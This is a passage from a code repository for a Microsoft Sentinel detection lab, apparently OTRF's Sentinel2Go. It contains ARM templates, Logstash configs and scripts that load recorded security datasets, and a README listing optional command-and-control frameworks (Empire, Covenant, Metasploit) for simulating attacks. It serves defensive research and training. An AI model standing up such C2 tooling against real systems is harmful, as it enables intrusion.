12 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 13 | * [Data collection rules (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 14 | * Windows event channels enabled 15 | * `System` 16 | * `Microsoft-Windows-Sysmon/Operational` 17 | * `Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational` 18 | * `Microsoft-Windows-Bits-Client/Operational` 19 | * `Microsoft-Windows-TerminalServices-LocalSessionManager/Operational` 20 | * `Directory Service` 21 | * `Microsoft-Windows-DNS-Client/Operational` 22 | * `Microsoft-Windows-Windows Firewall With Advanced Security/Firewall` 23 | * `Windows PowerShell` 24 | * `Microsoft-Windows-PowerShell/Operational` 25 | * `Microsoft-Windows-WMI-Activity/Operational` 26 | * Windows 10 Workstations (Max. 10) 27 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 28 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 29 | * [OPTIONAL] Sysmon 30 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 31 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 32 | * [OPTIONAL] Command and Control (c2) options: 33 | * `empire` 34 | * `covenant` 35 | * `metasploit` 36 | * Remote Access Restrictions (`AllowPublicIP` default option) 37 | * Access via Azure Bastion (Recommended. 
Additional costs applied) 38 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) -------------------------------------------------------------------------------- /grocery-list/Win10/demos/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 Demos 2 | 3 | | Items | Deploy | Deploy US Gov | 4 | | :---| :---| :--- | 5 | | Windows Microsoft Sentinel + Win10 Basic | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-Azure-Sentinel-Basic.json) | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-Azure-Sentinel-Basic.json) | 6 | | Microsoft Sentinel + Win10 + DCR (DCR Resource) | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-AzureResource.json) | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-AzureResource.json) | 7 | | Microsoft Sentinel + Win10 + DCR (Deployment Script Resource) | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-DeploymentScript.json) | [![Deploy to Azure 
Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-DeploymentScript.json) | 8 | -------------------------------------------------------------------------------- /grocery-list/Win10/demos/Sysmon-For-Windows/README.md: -------------------------------------------------------------------------------- 1 | # Sysmon for Windows Lab Environment 2 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Logstash + Event Hub 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2Fcustom-log-pipeline%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2Fcustom-log-pipeline%2Fazuredeploy.json) 5 | 6 | 7 | ## Grocery Items 8 | 9 | * Microsoft Sentinel 10 | * Logstash Server 11 | * `logstash-output-azure_loganalytics` plugin 12 | * Azure Event Hub 13 | * [OPTIONAL] Security Datasets 14 | 15 | ## Ingesting Security Datasets? 
16 | 17 | 1) Click on the **Deploy to Azure** badge 18 | 2) Set the following parameters: 19 | * Subscription 20 | * Resource Group 21 | * Workspace Name 22 | * Deploy Custom Logs Pipeline: Logstash 23 | * Add to Cart: security-small-datasets(1.1GB) or security-large-apt29(2GB) 24 | * Admin Username (Username for Linux VM - Logstash) 25 | * Admin Password (Password for Linux VM - Logstash) 26 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/linkedtemplates/customScript.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "vmName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name of the Linux virtual machine" 9 | } 10 | }, 11 | "extensionName": { 12 | "type": "string" 13 | }, 14 | "fileUris": { 15 | "type": "array" 16 | }, 17 | "commandToExecute": { 18 | "type": "string" 19 | }, 20 | "location": { 21 | "type": "string", 22 | "metadata": { 23 | "description": "Location for all resources." 
24 | } 25 | } 26 | }, 27 | "resources": [ 28 | { 29 | "type": "Microsoft.Compute/virtualMachines/extensions", 30 | "apiVersion": "2019-03-01", 31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]", 32 | "location": "[parameters('location')]", 33 | "properties": { 34 | "publisher": "Microsoft.Azure.Extensions", 35 | "type": "CustomScript", 36 | "typeHandlerVersion": "2.1", 37 | "autoUpgradeMinorVersion": true, 38 | "settings": {}, 39 | "protectedSettings": { 40 | "commandToExecute": "[parameters('commandToExecute')]", 41 | "fileUris": "[parameters('fileUris')]" 42 | } 43 | } 44 | } 45 | ] 46 | } 47 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/Dockerfile: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | FROM docker.elastic.co/logstash/logstash:7.5.2 5 | 6 | RUN logstash-plugin install microsoft-logstash-output-azure-loganalytics -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/config/logstash.yml: -------------------------------------------------------------------------------- 1 | pipeline.batch.size: 500 2 | config.reload.automatic: true 3 | config.reload.interval: 60s 4 | # pipeline.workers: 2 5 | # xpack.monitoring.elasticsearch.hosts: http://helk-elasticsearch:9200 6 | # log.level: warn 7 | # http.host: "0.0.0.0" 8 | # xpack.monitoring.enabled: true -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | mordor-logstash: 5 | build: ./ 6 | container_name: mordor-logstash 7 | logging: 8 | driver: "json-file" 9 | options: 10 | max-file: "9" 11 | max-size: "6m" 12 | volumes: 
13 | - /opt/logstash/pipeline:/usr/share/logstash/pipeline 14 | - /opt/logstash/scripts:/usr/share/logstash/scripts 15 | - /opt/logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml 16 | - /opt/datasets:/usr/share/logstash/datasets 17 | entrypoint: /usr/share/logstash/scripts/logstash-entrypoint.sh 18 | environment: 19 | - xpack.monitoring.enabled=false 20 | - WORKSPACE_ID=${WORKSPACE_ID} 21 | - EVENTHUB_CONNECTIONSTRING=${EVENTHUB_CONNECTIONSTRING} 22 | - WORKSPACE_KEY=${WORKSPACE_KEY} 23 | - EVENTHUB_NAME=${EVENTHUB_NAME} 24 | restart: always 25 | networks: 26 | mordor: 27 | 28 | networks: 29 | mordor: 30 | driver: bridge -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/eventhub-input.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | # If codec => json is enabled, Azure Monitor adds a suffix to the property name. Reference: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/data-collector-api#record-type-and-properties) 5 | # If codec => json is not enabled, you will have to use the KSQL scalar function parse_json() to expose nested fields. 
Reference: https://docs.microsoft.com/en-us/azure/kusto/query/parsejsonfunction 6 | # Example: mordordata_CL | extend m=parse_json(Message) | where m.ProcessName contains "powershell" 7 | 8 | input { 9 | azure_event_hubs { 10 | event_hub_connections => ["${EVENTHUB_CONNECTIONSTRING}"] 11 | threads => 2 12 | initial_position => "end" 13 | #codec => "json" 14 | } 15 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/json-file-input.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | input { 5 | file { 6 | path => "/usr/share/logstash/datasets/*.json" 7 | start_position => "beginning" 8 | sincedb_path => "/dev/null" 9 | #codec => "json" 10 | } 11 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/loganalytics-output-usgov.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | output { 5 | microsoft-logstash-output-azure-loganalytics { 6 | workspace_id => "${WORKSPACE_ID}" 7 | workspace_key => "${WORKSPACE_KEY}" 8 | endpoint => "ods.opinsights.azure.us" 9 | custom_log_table_name => "prerecorded" 10 | plugin_flush_interval => 5 11 | } 12 | #stdout { codec => rubydebug } 13 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/loganalytics-output.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | output { 5 | microsoft-logstash-output-azure-loganalytics { 6 | workspace_id => "${WORKSPACE_ID}" 7 | workspace_key => "${WORKSPACE_KEY}" 8 | custom_log_table_name => "prerecorded" 9 | 
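plugin_flush_interval => 5
10 | }
11 | #stdout { codec => rubydebug }
12 | }
--------------------------------------------------------------------------------
/grocery-list/custom-log-pipeline/logstash/scripts/logstash-entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Container entrypoint for the Logstash image built from ../Dockerfile.
# Unless the caller already set them, it derives the JVM heap options
# (LS_JAVA_OPTS) from the host's available memory and the pipeline worker
# count (PIPELINE_WORKERS) from the CPU count, removes the image's default
# pipeline file, then hands over to the stock docker-entrypoint.
# HELK_ERROR_TAG / HELK_LOGSTASH_JAVA_OPTS are optional and expand to empty
# strings unless the caller exports them (docker-compose.yml here does not).

# ********* Setting LS_JAVA_OPTS ***************
if [[ -z "$LS_JAVA_OPTS" ]]; then
  while true; do
    # MemAvailable (kB) converted to MiB. Default to 0 when /proc/meminfo does
    # not expose the field so the integer comparisons below cannot error out.
    AVAILABLE_MEMORY=$(awk '/MemAvailable/{printf "%.f", $2/1024}' /proc/meminfo)
    AVAILABLE_MEMORY=${AVAILABLE_MEMORY:-0}
    if [ "$AVAILABLE_MEMORY" -ge 900 ] && [ "$AVAILABLE_MEMORY" -le 1000 ]; then
      LS_MEMORY="400m"
      LS_MEMORY_HIGH="1000m"
    elif [ "$AVAILABLE_MEMORY" -ge 1001 ] && [ "$AVAILABLE_MEMORY" -le 3000 ]; then
      LS_MEMORY="700m"
      LS_MEMORY_HIGH="1300m"
    elif [ "$AVAILABLE_MEMORY" -gt 3000 ]; then
      # Set high & low, so logstash doesn't use everything unnecessarily, it will usually flux up and down in usage -- and doesn't "severely" despite what everyone seems to believe
      LS_MEMORY="$(( AVAILABLE_MEMORY / 4 ))m"
      LS_MEMORY_HIGH="$(( AVAILABLE_MEMORY / 2 ))m"
      if [ "$AVAILABLE_MEMORY" -gt 31000 ]; then
        LS_MEMORY="8000m"
        LS_MEMORY_HIGH="31000m"
      fi
    else
      # Under 900 MB free: report the measured value, wait and re-measure.
      # 'continue' is required here; falling through would export
      # "-Xms -Xmx" with empty heap values and leave the loop.
      echo "$HELK_ERROR_TAG $AVAILABLE_MEMORY MB is not enough memory for Logstash yet.."
      sleep 1
      continue
    fi
    export LS_JAVA_OPTS="${HELK_LOGSTASH_JAVA_OPTS} -Xms${LS_MEMORY} -Xmx${LS_MEMORY_HIGH} "
    break
  done
fi
echo "Setting LS_JAVA_OPTS to $LS_JAVA_OPTS"

# ********* Setting Logstash PIPELINE_WORKERS ***************
if [[ -z "$PIPELINE_WORKERS" ]]; then
  # Get total CPUs/cores as reported by OS
  TOTAL_CORES=$(getconf _NPROCESSORS_ONLN 2>/dev/null)
  # try one more way
  [ -z "$TOTAL_CORES" ] && TOTAL_CORES=$(getconf NPROCESSORS_ONLN 2>/dev/null)
  # Unable to get reported cores
  if [ -z "$TOTAL_CORES" ]; then
    TOTAL_CORES=1
    echo "$HELK_ERROR_TAG unable to get number of CPUs/cores as reported by the OS"
  fi
  # Set workers based on available cores
  if [ "$TOTAL_CORES" -ge 1 ] && [ "$TOTAL_CORES" -le 3 ]; then
    PIPELINE_WORKERS=1
  # Divide by 2
  elif [ "$TOTAL_CORES" -ge 4 ]; then
    PIPELINE_WORKERS="$(( TOTAL_CORES / 2 ))"
  # some unknown number
  else
    echo "[!] reported CPUs/cores not an integer? not greater or equal to 1.."
    PIPELINE_WORKERS=1
  fi
  # Presumably consumed by the image's docker-entrypoint as pipeline.workers
  # (logstash.yml in this directory leaves that key commented out) -- confirm.
  export PIPELINE_WORKERS
fi
echo "Setting PIPELINE_WORKERS to ${PIPELINE_WORKERS}"

# *** Remove Default config ****
rm -f /usr/share/logstash/pipeline/logstash.conf

# ********** Starting Logstash *****************
echo "Running docker-entrypoint script.."
# exec so the Logstash process replaces this shell as PID 1 and receives
# the container's stop signal directly instead of leaving bash to absorb it.
exec /usr/local/bin/docker-entrypoint
--------------------------------------------------------------------------------
/grocery-list/custom-log-pipeline/scripts/Get-Security-Datasets.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Loads pre-recorded Security Datasets into the Logstash file-input pipeline:
# stops the Logstash container, installs the json-file-input.conf pipeline,
# clones OTRF/Security-Datasets, unzips the selected host datasets into
# /opt/logstash/datasets and starts the container again.
#
# Options:
#   -d  SMALL_DATASETS | LARGE_APT29   dataset set to import (required)
#   -h  print usage
# Exits 1 on a missing or invalid option, or when a required step fails.

usage(){
  echo " "
  echo "Usage: $0 [option...]" >&2
  echo
  echo "   -d         What Security datasets you would like to import (SMALL_DATASETS or LARGE_APT29)"
  echo
  echo "Examples:"
  echo " $0 -d SMALL_DATASETS"
  echo " $0 -d LARGE_APT29"
  echo " "
  exit 1
}

# ************ Command Options **********************
while getopts :d:h option
do
  case "${option}"
  in
    d) SECURITY_DATASETS=$OPTARG;;
    h) usage;;
    \?) usage;;
    : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;;
    * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
  esac
done

if ((OPTIND == 1))
then
  echo "No options specified"
  usage
fi

if [ -z "$SECURITY_DATASETS" ]; then
  echo "[!] Make sure you provide values for the Security Datasets (-d)"
  usage
fi

# usage exits with 1, so no branch below runs with an unknown value.
case $SECURITY_DATASETS in
  SMALL_DATASETS) ;;
  LARGE_APT29) ;;
  *) echo "[!] Not a valid dataset option"; usage;;
esac

# Host paths bind-mounted into the container (see logstash/docker-compose.yml).
PIPELINE_DIR=/opt/logstash/pipeline
DATASETS_DIR=/opt/logstash/datasets
REPO_DIR=/opt/Security-Datasets
# NOTE(review): docker-compose.yml in this directory names the container
# mordor-logstash; confirm which name the VM deployment actually uses.
CONTAINER_NAME=logstash

# Stopping Container
echo "Stopping Logstash.."
docker stop "$CONTAINER_NAME"

# Adding Logstash config. The pipeline file is fetched from the mutable master
# branch; pin the URL to a commit for reproducible deployments. Abort if the
# download fails rather than starting Logstash without the file input.
mkdir -p "$PIPELINE_DIR" "$DATASETS_DIR"
wget -O "$PIPELINE_DIR/json-file-input.conf" https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/grocery-list/custom-log-pipeline/logstash/pipeline/json-file-input.conf \
  || { echo "[!] Could not download json-file-input.conf"; exit 1; }

echo "Installing Git.."
apt-get install -y git unzip || { echo "[!] Could not install git and unzip"; exit 1; }

echo "Cloning Security Datasets repo.."
# Re-runs reuse an existing clone instead of failing on a non-empty target.
if [ ! -d "$REPO_DIR/.git" ]; then
  git clone https://github.com/OTRF/Security-Datasets.git "$REPO_DIR" \
    || { echo "[!] Could not clone Security-Datasets"; exit 1; }
fi

if [[ $SECURITY_DATASETS == "SMALL_DATASETS" ]]; then
  echo "Decompressing every small security dataset.."
  cd "$REPO_DIR/datasets/atomic/" || exit 1
  # NUL-delimited so archive paths with spaces survive; only 'host' datasets are loaded.
  find . -type f -name "*.zip" -print0 | grep -z -i 'host' | while IFS= read -r -d '' filename; do
    unzip -o -d "$DATASETS_DIR/" "$filename"
  done
  # find . -type f -name "*.tar.gz" -print0 | xargs -0 -I{} tar xf {} -C /opt/logstash/datasets/
elif [[ $SECURITY_DATASETS == "LARGE_APT29" ]]; then
  echo "Decompressing only APT29 Dataset.."
  cd "$REPO_DIR/datasets/compound/apt29" || exit 1
  # -o avoids unzip's interactive overwrite prompt, which would hang a re-run.
  find . -type f -name "*_manual.zip" -print0 | xargs -0 -I{} unzip -o {} -d "$DATASETS_DIR/"
fi
folder_size=$(du -ach "$DATASETS_DIR/" | tail -1 | cut -f1)
echo "Extracted $folder_size in security event logs.."

# Starting Container
echo "Starting Logstash container"
docker start "$CONTAINER_NAME"
--------------------------------------------------------------------------------
/microsoft-sentinel/README.md:
--------------------------------------------------------------------------------
1 | # Microsoft Sentinel
2 | 
3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fmicrosoft-sentinel%2Fazuredeploy.json)
4 | 
5 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fmicrosoft-sentinel%2Fazuredeploy.json)
6 | 
--------------------------------------------------------------------------------
/microsoft-sentinel/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema":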
"https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "value": "Sentinel2Go" 7 | }, 8 | "pricingTier": { 9 | "value": "PerGB2018" 10 | }, 11 | "dataRetention": { 12 | "value": 30 13 | }, 14 | "immediatePurgeDataOn30Days": { 15 | "value": true 16 | }, 17 | "enableAdditionalLASolutions": { 18 | "value": [] 19 | }, 20 | "enableDataConnectorsKind": { 21 | "value": [] 22 | }, 23 | "enableLAFunctions": { 24 | "value": [] 25 | }, 26 | "postAnalyticRules": { 27 | "value": false 28 | }, 29 | "userAssignedIdentityName": { 30 | "value": "" 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/alerts/scheduledAlerts.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace" 9 | } 10 | }, 11 | "dataConnectors": { 12 | "type": "array", 13 | "metadata": { 14 | "description": "Data connectors: [\"AzureActivityLog\",\"SecurityEvents\",\"WindowsFirewall\",\"DnsAnalytics\"]. Reference: https://docs.microsoft.com/azure/templates/microsoft.operationalinsights/2020-03-01-preview/workspaces/datasources#microsoftoperationalinsightsworkspacesdatasources-object and https://github.com/Azure/Azure-Sentinel/blob/master/Tools/Sentinel-All-In-One/ARMTemplates/LinkedTemplates/scheduledAlerts.json" 15 | } 16 | }, 17 | "specificScheduledAlerts": { 18 | "type": "array", 19 | "metadata": { 20 | "description": "Name of specific scheduled alert rules to enable. 
Reference: https://github.com/Azure/Azure-Sentinel/tree/master/Detections" 21 | } 22 | }, 23 | "roleGuid": { 24 | "type": "string", 25 | "defaultValue": "[newGuid()]" 26 | } 27 | }, 28 | "functions": [], 29 | "variables": { 30 | "identityName": "[concat('userIdentity',uniqueString(resourceGroup().id))]", 31 | "initialArguments": "[concat('-Workspace ', parameters('workspaceName'), ' -ResourceGroup ', resourceGroup().name, ' -DataConnectors ', replace(replace(string(parameters('dataConnectors')), '[', ''), ']', ''))]", 32 | "alertArguments": "[if(empty(parameters('specificScheduledAlerts')), variables('initialArguments'), concat(variables('initialArguments'), ' -Alerts ', replace(replace(replace(string(parameters('specificScheduledAlerts')), '[', ''), ']', ''), ' ','_')))]" 33 | }, 34 | "resources": [ 35 | { 36 | "type": "Microsoft.ManagedIdentity/userAssignedIdentities", 37 | "name": "[variables('identityName')]", 38 | "apiVersion": "2018-11-30", 39 | "location": "[resourceGroup().location]" 40 | }, 41 | { 42 | "type": "Microsoft.Resources/deploymentScripts", 43 | "apiVersion": "2020-10-01", 44 | "name": "sleep", 45 | "location": "[resourceGroup().location]", 46 | "kind": "AzurePowerShell", 47 | "dependsOn": [ 48 | "[concat('Microsoft.ManagedIdentity/userAssignedIdentities/', variables('identityName'))]" 49 | ], 50 | "properties": { 51 | "forceUpdateTag": "1", 52 | "azPowerShellVersion": "3.0", 53 | "arguments": "", 54 | "scriptContent": "Start-Sleep -Seconds 120", 55 | "supportingScriptUris": [], 56 | "timeout": "PT30M", 57 | "cleanupPreference": "Always", 58 | "retentionInterval": "P1D" 59 | } 60 | }, 61 | { 62 | "apiVersion": "2017-09-01", 63 | "type": "Microsoft.Authorization/roleAssignments", 64 | "name": "[parameters('roleGuid')]", 65 | "dependsOn": [ 66 | "[concat('Microsoft.Resources/deploymentScripts/', 'sleep')]" 67 | ], 68 | "properties": { 69 | "roleDefinitionId": "[concat('/subscriptions/', subscription().subscriptionId, 
'/providers/Microsoft.Authorization/roleDefinitions/', 'b24988ac-6180-42a0-ab88-20f7382dd24c')]", 70 | "principalId": "[reference(resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', variables('identityName')), '2018-11-30', 'Full').properties.principalId]", 71 | "scope": "[resourceGroup().id]" 72 | } 73 | }, 74 | { 75 | "type": "Microsoft.Resources/deploymentScripts", 76 | "apiVersion": "2020-10-01", 77 | "name": "runPowerShellInline", 78 | "location": "[resourceGroup().location]", 79 | "kind": "AzurePowerShell", 80 | "identity": { 81 | "type": "UserAssigned", 82 | "userAssignedIdentities": { 83 | "[resourceID('Microsoft.ManagedIdentity/userAssignedIdentities/',variables('identityName'))]": {} 84 | } 85 | }, 86 | "dependsOn": [ 87 | "[concat('Microsoft.Authorization/roleAssignments/', parameters('roleGuid'))]" 88 | ], 89 | "properties": { 90 | "forceUpdateTag": "1", 91 | "azPowerShellVersion": "3.0", 92 | "arguments": "[variables('alertArguments')]", 93 | "primaryScriptUri": "https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/scripts/Enable-ScheduledAlerts.ps1", 94 | "supportingScriptUris": [], 95 | "timeout": "PT30M", 96 | "cleanupPreference": "OnSuccess", 97 | "retentionInterval": "P1D" 98 | } 99 | } 100 | ], 101 | "outputs": {} 102 | } 103 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/customScript.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "vmName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name of the Linux virtual machine" 9 | } 10 | }, 11 | "extensionName": { 12 | "type": "string" 13 | }, 14 | "fileUris": { 15 | "type": "array" 16 | }, 17 | "commandToExecute": { 18 | "type": "string" 19 | }, 20 | "location": { 21 | 
"type": "string", 22 | "metadata": { 23 | "description": "Location for all resources." 24 | } 25 | } 26 | }, 27 | "resources": [ 28 | { 29 | "type": "Microsoft.Compute/virtualMachines/extensions", 30 | "apiVersion": "2019-03-01", 31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]", 32 | "location": "[parameters('location')]", 33 | "properties": { 34 | "publisher": "Microsoft.Azure.Extensions", 35 | "type": "CustomScript", 36 | "typeHandlerVersion": "2.1", 37 | "autoUpgradeMinorVersion": true, 38 | "settings": {}, 39 | "protectedSettings": { 40 | "commandToExecute": "[parameters('commandToExecute')]", 41 | "fileUris": "[parameters('fileUris')]" 42 | } 43 | } 44 | } 45 | ] 46 | } 47 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/customScriptExtension.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "vmName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name of the Windows virtual machine" 9 | } 10 | }, 11 | "extensionName": { 12 | "type": "string" 13 | }, 14 | "fileUris": { 15 | "type": "array" 16 | }, 17 | "commandToExecute": { 18 | "type": "string" 19 | }, 20 | "location": { 21 | "type": "string", 22 | "metadata": { 23 | "description": "Location for all resources." 
24 | } 25 | } 26 | }, 27 | "resources": [ 28 | { 29 | "type": "Microsoft.Compute/virtualMachines/extensions", 30 | "apiVersion": "2016-08-30", 31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]", 32 | "location": "[parameters('location')]", 33 | "properties": { 34 | "publisher": "Microsoft.Compute", 35 | "type": "CustomScriptExtension", 36 | "typeHandlerVersion": "1.8", 37 | "autoUpgradeMinorVersion": true, 38 | "settings": { 39 | "fileUris": "[parameters('fileUris')]", 40 | "commandToExecute": "[parameters('commandToExecute')]" 41 | } 42 | } 43 | } 44 | ] 45 | } 46 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/association.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "virtualMachines": { 6 | "type": "array", 7 | "metadata": { 8 | "description": "List of endpoints to associate data collection rules to" 9 | } 10 | }, 11 | "dataCollectionRuleId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "The resource ID of the data collection rule that will be associated to the VMs deployed." 15 | } 16 | }, 17 | "dataCollectionRuleName": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Name of the data collection rule associated with the VMs deployed" 21 | } 22 | }, 23 | "location": { 24 | "type": "string", 25 | "metadata": { 26 | "description": "Location for all resources." 
27 | }, 28 | "defaultValue": "[resourceGroup().location]" 29 | } 30 | }, 31 | "variables": {}, 32 | "resources": [ 33 | { 34 | "name": "[concat(parameters('virtualMachines')[copyIndex('vmDCRCopy')].vmName, '/microsoft.insights/', parameters('dataCollectionRuleName'))]", 35 | "type": "Microsoft.Compute/virtualMachines/providers/dataCollectionRuleAssociations", 36 | "apiVersion": "2019-11-01-preview", 37 | "location": "[parameters('location')]", 38 | "copy": { 39 | "name": "vmDCRCopy", 40 | "count": "[length(parameters('virtualMachines'))]" 41 | }, 42 | "properties": { 43 | "description": "Association of data collection rule. Deleting this association will break the data collection for this virtual machine.", 44 | "dataCollectionRuleId": "[parameters('dataCollectionRuleId')]" 45 | } 46 | } 47 | ], 48 | "outputs": {} 49 | } 50 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/creation-azureresource.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "ruleName": { 6 | "type": "String", 7 | "metadata": { 8 | "description": "Specifies the name of the data collection rule to create." 9 | } 10 | }, 11 | "location": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Specifies the location in which to create the data collection rule." 15 | }, 16 | "defaultValue": "[resourceGroup().location]" 17 | }, 18 | "dataSources": { 19 | "type": "Object", 20 | "metadata": { 21 | "description": "The specification of data sources." 22 | } 23 | }, 24 | "dataFlows": { 25 | "type": "Array", 26 | "metadata": { 27 | "description": "The specification of data flows." 
